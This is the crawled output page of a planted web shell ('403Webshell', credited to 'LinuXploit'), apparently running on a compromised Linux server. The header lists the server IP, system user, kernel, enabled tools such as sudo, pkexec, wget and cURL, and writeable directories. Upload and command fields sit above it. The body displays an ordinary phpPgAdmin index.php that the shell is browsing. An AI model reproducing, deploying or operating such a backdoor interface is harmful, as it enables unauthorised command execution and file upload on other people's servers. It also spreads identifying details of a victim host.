403Webshell
Server IP : 103.75.185.95  /  Your IP : 216.73.217.162
Web Server : nginx/1.30.0
System : Linux cs-linux-20260509085757017 6.1.0-49-cloud-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.174-1 (2026-05-26) x86_64
User : cuuhootoxema ( 1215)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/share/fastpanel2-phppgadmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/share/fastpanel2-phppgadmin/index.php
<?php

	/**
	 * Main access point to the app.
	 *
	 * $Id: index.php,v 1.13 2007/04/18 14:08:48 mr-russ Exp $
	 */

	// Include application functions
	$_no_db_connection = true;
	include_once('./libraries/lib.inc.php');
	$misc->printHeader('', null, true);

	$rtl = (strcasecmp($lang['applangdir'], 'rtl') == 0);

	$cols = $rtl ? '*,'.$conf['left_width'] : $conf['left_width'].',*';

	if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_POST['_originalPath'])) {
		$newPath = basename($_POST['_originalPath']);
		$mainframe = '<frame src="' . $newPath . '" name="detail" id="detail" frameborder="0" />';
	} else {
		$mainframe = '<frame src="intro.php" name="detail" id="detail" frameborder="0" />';
	}
?>
<frameset cols="<?php echo $cols ?>">

<?php if ($rtl) echo $mainframe; ?>

	<frame src="browser.php" name="browser" id="browser" frameborder="0" />

<?php if (!$rtl) echo $mainframe; ?>

	<noframes>
	<body>
		<?php echo $lang['strnoframes'] ?><br />
		<a href="intro.php"><?php echo $lang['strnoframeslink'] ?></a>
	</body>
	</noframes>

</frameset>

<?php
	$misc->printFooter(false);
?>

Youez - 2016 - github.com/yon3zu
LinuXploit